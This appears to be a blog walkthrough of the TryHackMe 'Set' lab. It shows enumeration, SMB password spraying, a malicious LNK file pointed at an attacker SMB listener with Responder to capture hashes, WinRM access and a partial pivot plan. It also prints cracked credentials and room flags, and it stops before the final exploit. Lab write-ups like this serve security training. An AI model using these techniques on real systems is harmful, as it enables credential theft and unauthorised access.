Set TryHackme Walkthrough

By Shamsher khan This is a Writeup of Tryhackme room “Set”

https://tryhackme.com/room/set

Room link: https://tryhackme.com/room/set
Note: This room is for Premium Members Only. who purchased THM premium membership.

Walkthrough — SetStoryOnce again you find yourself on the internal network of the Windcorp Corporation. This tasted so good last time you were there, you came backfor more. However, they managed to secure the Domain Controller this time, so you need to find another server and your first scan discovered Set.

Set is used as a platform for developers and has had some problems in the recent past. They had to reset a lot of users and restore backups (maybe you were not the only hacker on their network?). So they decided to make sure all users used proper passwords and closed of some of the loose policies.

Can you still find a way in? Are some users more equal than others? Or more sloppy? And maybe you need to think outside the box a little bit to circumvent their new security controls…Happy Hacking! @4nqr34z and @theart42Let’s start with enumeration first.nmapEnum4linux reveals

Let’s start with enumeration first

nmap -p- -sC -sV 10.10.177.99

We have three ports open, MSRPC, HTTPS, and SMB. The results also inform us to add seth.windcorp.thm to our hosts file. There is also a Windows Remote Management port open on 5985 and an additional MSRPC port on 49666. Lets first navigate to the website and then move on to SMB.

Add hostname=set.windcorp.thm to /etc/hosts

HTTPS
Navigating to the homepage of the HTTPS site returns a company website

Directory Searching

gobuster dir -u https://set.windcorp.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
gobuster dir -u https://set.windcorp.thm/assets -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

These appear to be directories that host the source code of the website, we can snoop around these files in the debugger. Within the source code of the website we can see a hidden section of testimonials with usernames. The hint of the room suggested that they were previously hacked therefore making those usernames valuable.

Visit view-source:https://set.windcorp.thm/assets/data/users.xml

This file contains many usernames belonging to the company.

We can sort these to obtain only the username and brute force valid accounts on the Set domain. The following command downloads the xml file, extracts the usernames, deletes empty spaces and stores them in a text file.

curl -k https://set.windcorp.thm/assets/data/users.xml -o user.xml

Extracting the usernames from users.xml file

xmllint  --xpath "//row/email"  users.xml | sed -e 's/<email>//g' | sed -e 's/<\/email>//g' | sed -e 's/@windcorp.thm//g'>users.txt

SMB

Using a quick smbclient scan reveals we need credentials to enumerate SMB

We can brute force valid accounts with the usernames we acquired from the website with crackmapexec using the rockyou or common-SSH passwords.

crackmapexec smb set.windcorp.thm -u users.txt -p rockyou.txt

We can see the valid credentials are myrtleowe:Passw@rd

Listing the shares with the new found credentials

smbclient -L \\set.windcorp.thm -U myrtleowe

If we logon to the Files share we see the following.

The Info.txt file is the first flag of the room. We do not yet have access for evil-winrm

Flag1: THM{4c66e2b8d4c45a65e6a7d0c7ad4a5d7ff245dc14}

We are counting on someone unzipping the files, because it says they will review them.Not too commonly known, you can change the icon-path in a LNK-file and point it to a SMB-server capturing the users password-hash

The beauty with this trick, is that the user don’t even has to click the lnk. Opening a window displaying contents of a folder containing such a file, is enough. First we create our lnk, using this excellent tool. http://www.mamachine.org/mslink/index.en.html

Note: Due to some reason i deploy my machine again

machine ip = 10.10.169.112

./mslink_v1.3.sh -l notimportant -n shortcut -i \\\\10.2.12.26\\MichelleWat -o shortcut.lnkzip myfile.zip shortcut.lnk

Start Responder

responder -I tun0

Uploading file to share

Search 10.10.169.112 (Machine ip) in browser

yess we got hash

Now crack this hash for user MichelleWat

User: MichelleWat

Password: !!!MICKEYmouse

We try WinRM and this time we are in luck, Install evil-winrm tool

gem install evil-winrm

And Here We got

Flag 2 THM{690798b1780964f5f51cebd854da5a2ea236ebb5}

We spot a listening port we didn’t see from the outside

Let’s investigate the identified process sitting on the PID 4736. It happens that you forget a command syntax (it occurs to me quite often). The PowerShell Get-Help command does the job.

get-process

listening to 2805A bit more research reveals there could be a serious vulnerability using .Net Deserialization

https://www.veeam.com/kb3144

And the version looks really promising indeed!So. We need to get to that port. Port-forwarding user msf? Trying uploading a meterpreter.

We start with uploading plink.exe, one of the command line SSH tools for Windows. Make sure you use the new version!

Downloading plink.exe:

Assuming that we don’t have plink.exe on our Windows Machine, let’s browse to https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html and download the file:

There are two binaries available; as you can guess, 32-bit and 64-bit (There are also ARM architecture executables for Windows, if you scroll down)

upload plink.exe to deployed machine

python -m SimpleHTTPServer 80

Due to my tryhackme subscription expire i couldn’t explore my writeup

So here is

Flag3 : THM{934f7faaadab3b040edab8214789114c9d3049dd}

You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher

For more walkthroughs stay tuned…
Before you go…

Visit my other walkthrough’s:-

and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!

--

--

Web Application Pen-tester || CTF Player || Security Analyst || Freelance Cyber Security Trainer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Shamsher khan

Web Application Pen-tester || CTF Player || Security Analyst || Freelance Cyber Security Trainer